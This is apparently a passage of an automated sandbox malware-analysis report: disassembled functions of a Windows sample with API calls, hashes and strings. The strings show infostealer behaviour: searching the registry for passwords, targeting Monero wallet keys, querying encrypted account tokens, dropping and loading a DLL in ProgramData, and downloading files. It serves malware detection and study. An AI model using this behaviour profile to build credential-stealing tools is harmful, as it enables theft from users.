                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                  • String ID: :
                                  • API String ID: 2677904052-3653984579
                                  • Opcode ID: c61aa46bc3f767992cbd0e2d6255e1225922d3e50a44c9ecf03eb8e3f5d8fc07
                                  • Instruction ID: 2dcc3026387cdc0074771d953c17dc98f83ad246e8f28e7f40957179f560c41a
                                  • Opcode Fuzzy Hash: c61aa46bc3f767992cbd0e2d6255e1225922d3e50a44c9ecf03eb8e3f5d8fc07
                                  • Instruction Fuzzy Hash: F231AFB5940108DBDB18EBE0ED95DFEB3B8EB45301B205228F516B32D9CF30A986DB50
                                  Function 00E78290 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0173DAC8,00000000,?,00E80E14,00000000,?,00000000), ref: 00E782C0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E782C7
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00E782E8
                                  • __aulldiv.LIBCMT ref: 00E78302
                                  • __aulldiv.LIBCMT ref: 00E78310
                                  • wsprintfA.USER32 ref: 00E7833C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                  • String ID: %d MB$@
                                  • API String ID: 2774356765-3474575989
                                  • Opcode ID: 9210f7c31cb42694ba4c72c8b72fca85e5ffe9a4b4e30e157dddd3c33377e0ae
                                  • Instruction ID: 0bb7ee55d34c03c86ce6b41ef673d490d456eac91c4e0abd0fa787610636a5d6
                                  • Opcode Fuzzy Hash: 9210f7c31cb42694ba4c72c8b72fca85e5ffe9a4b4e30e157dddd3c33377e0ae
                                  • Instruction Fuzzy Hash: BE213BB1E44208ABDB14DFD4CD49FAEB7B8FB44B10F108519F219BB2C4C77859008BA4
                                  Function 00E660F0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E7AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E7AAF6
                                    • Part of subcall function 00E64800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E64889
                                    • Part of subcall function 00E64800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E64899
                                  • InternetOpenA.WININET(00E80DFB,00000001,00000000,00000000,00000000), ref: 00E6615F
                                  • StrCmpCA.SHLWAPI(?,0173E308), ref: 00E66197
                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00E661DF
                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00E66203
                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 00E6622C
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00E6625A
                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00E66299
                                  • InternetCloseHandle.WININET(?), ref: 00E662A3
                                  • InternetCloseHandle.WININET(00000000), ref: 00E662B0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2507841554-0
                                  • Opcode ID: dca7b530a77fde414993dc1c2348cb938690c122001eb7e1bbe90466d92cbfd8
                                  • Instruction ID: 45fdcd5469d0a084ffc4aa56070c93e07000e26c2b32a506b8e1e9188f190c6c
                                  • Opcode Fuzzy Hash: dca7b530a77fde414993dc1c2348cb938690c122001eb7e1bbe90466d92cbfd8
                                  • Instruction Fuzzy Hash: B251D4B1A50208ABDF24DF90DC55FEE77B9AB44345F1080A8F609B71C4DB70AA88CF95
                                  Function 00EE012E Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • type_info::operator==.LIBVCRUNTIME ref: 00EE024D
                                  • ___TypeMatch.LIBVCRUNTIME ref: 00EE035B
                                  • CatchIt.LIBVCRUNTIME ref: 00EE03AC
                                  • CallUnexpected.LIBVCRUNTIME ref: 00EE04C8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                  • String ID: csm$csm$csm
                                  • API String ID: 2356445960-393685449
                                  • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                  • Instruction ID: 44619974efbc27d58748bb47274ec1fb1232baf416a8fc2bd2b8365c2ec70d63
                                  • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                  • Instruction Fuzzy Hash: 1FB19C3180024DEFCF15DFA6D9819AEBBB5FF08318B14616AE9117B252D3B0DA91CF91
                                  Function 00E67330 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00E6739A
                                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00E67411
                                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00E6746D
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00E674B2
                                  • HeapFree.KERNEL32(00000000), ref: 00E674B9
                                  • task.LIBCPMTD ref: 00E675B5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$EnumFreeOpenProcessValuetask
                                  • String ID: Password
                                  • API String ID: 775622407-3434357891
                                  • Opcode ID: 0f13e9fd500cbf59b6944b8c32bb4589e721b81a237fb3360d292b16201b06c0
                                  • Instruction ID: 6c237c75401e725c3e66d77b1a1eae61491903e7562cf82197f74cc7b4bb1b3e
                                  • Opcode Fuzzy Hash: 0f13e9fd500cbf59b6944b8c32bb4589e721b81a237fb3360d292b16201b06c0
                                  • Instruction Fuzzy Hash: 47615CB184426C9BDB24DB50DC55BDAB3B8BF44344F0081E9E689B6145EFB06BC9CF90
                                  Function 00E778B0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 42registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E778C4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E778CB
                                  • RegOpenKeyExA.ADVAPI32(80000002,0172B958,00000000,00020119,Ix), ref: 00E778EB
                                  • RegQueryValueExA.ADVAPI32(Ix,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00E7790A
                                  • RegCloseKey.ADVAPI32(Ix), ref: 00E77914
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: CurrentBuildNumber$Ix
                                  • API String ID: 3225020163-4041952297
                                  • Opcode ID: e7a106df18fa5d4758a75dca2d33c3637bcbb32c93aa6f40ddf80662caa854cd
                                  • Instruction ID: 1dda18136a01a668f2f31165ce6dec605a7bc4ea1413592ecd7ff5247f11410a
                                  • Opcode Fuzzy Hash: e7a106df18fa5d4758a75dca2d33c3637bcbb32c93aa6f40ddf80662caa854cd
                                  • Instruction Fuzzy Hash: A70117F5A40309BFEB14DBD4DC49FAE77B8EB44700F1045A4F615A7289D7705A40CB90
                                  Function 00E6BA50 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                    • Part of subcall function 00E7ACC0: lstrlen.KERNEL32(?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E7ACD5
                                    • Part of subcall function 00E7ACC0: lstrcpy.KERNEL32(00000000), ref: 00E7AD14
                                    • Part of subcall function 00E7ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E7AD22
                                    • Part of subcall function 00E7AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E7AC82
                                    • Part of subcall function 00E7AC30: lstrcat.KERNEL32(00000000), ref: 00E7AC92
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                    • Part of subcall function 00E7AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E7AAF6
                                  • lstrlen.KERNEL32(00000000), ref: 00E6BC6F
                                    • Part of subcall function 00E78FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E78FE2
                                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 00E6BC9D
                                  • lstrlen.KERNEL32(00000000), ref: 00E6BD75
                                  • lstrlen.KERNEL32(00000000), ref: 00E6BD89
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                  • API String ID: 3073930149-1079375795
                                  • Opcode ID: 4ea3c6001dbb7e17a355f175a2d48e329f8e63bdca157d6628ce40dc50239725
                                  • Instruction ID: d6a482a3ddf5701ca4f5d2b468747b7152cc5e5627722b0f1a924d99e268139f
                                  • Opcode Fuzzy Hash: 4ea3c6001dbb7e17a355f175a2d48e329f8e63bdca157d6628ce40dc50239725
                                  • Instruction Fuzzy Hash: EFB15772910108ABCB14FBA0DD56EEEB3BDAF94300F549578F10A77095EF346A48CB62
                                  Function 00E76A10 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess$DefaultLangUser
                                  • String ID: *
                                  • API String ID: 1494266314-163128923
                                  • Opcode ID: 6d2a0ffdc46077bf1c7e3987296eb2f8c264fa63bd746cac20cdc29265796c4b
                                  • Instruction ID: 72fd303be6c48bce21582bd5ec8055699bd0bed8647804bf0829638eb2439bfd
                                  • Opcode Fuzzy Hash: 6d2a0ffdc46077bf1c7e3987296eb2f8c264fa63bd746cac20cdc29265796c4b
                                  • Instruction Fuzzy Hash: 48F08272908209EFD358DFE0E40975CBB71EB0470BF1142A5F629A61C8D6B04AE0EB51
                                  Function 00E708A0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 255fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                    • Part of subcall function 00E79850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00E708DC,C:\ProgramData\chrome.dll), ref: 00E79871
                                    • Part of subcall function 00E6A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00E6A098
                                  • StrCmpCA.SHLWAPI(00000000,01738A48), ref: 00E70922
                                  • StrCmpCA.SHLWAPI(00000000,01738AE8), ref: 00E70B79
                                  • StrCmpCA.SHLWAPI(00000000,017389F8), ref: 00E70A0C
                                    • Part of subcall function 00E7AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E7AAF6
                                  • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00E70C35
                                  Strings
                                  • C:\ProgramData\chrome.dll, xrefs: 00E70C30
                                  • C:\ProgramData\chrome.dll, xrefs: 00E708CD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                  • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                  • API String ID: 585553867-663540502
                                  • Opcode ID: b070531bbf35e648fd627ef185646fc9691a29206d0b64726efe47ff306f81fa
                                  • Instruction ID: c0bbcbeb34a68844bd806778fd35a9596076dafb37f91d21f2f763af4943001b
                                  • Opcode Fuzzy Hash: b070531bbf35e648fd627ef185646fc9691a29206d0b64726efe47ff306f81fa
                                  • Instruction Fuzzy Hash: E8A165717002089FCB28FF64D996EAD77BAAFD5300F14957DE40EAF245DA309A05CB92
                                  Function 00E69E30 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 163stringsleepCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E78CF0: GetSystemTime.KERNEL32(00E80E1B,0173A010,00E805B6,?,?,00E613F9,?,0000001A,00E80E1B,00000000,?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E78D16
                                  • wsprintfA.USER32 ref: 00E69E7F
                                  • lstrcat.KERNEL32(00000000,?), ref: 00E69F03
                                  • lstrcat.KERNEL32(00000000,?), ref: 00E69F17
                                  • lstrcat.KERNEL32(00000000,00E812D8), ref: 00E69F29
                                  • lstrcpy.KERNEL32(?,00000000), ref: 00E69F7C
                                  • Sleep.KERNEL32(00001388), ref: 00E6A013
                                    • Part of subcall function 00E799A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E799C5
                                    • Part of subcall function 00E799A0: Process32First.KERNEL32(00E6A056,00000128), ref: 00E799D9
                                    • Part of subcall function 00E799A0: Process32Next.KERNEL32(00E6A056,00000128), ref: 00E799F2
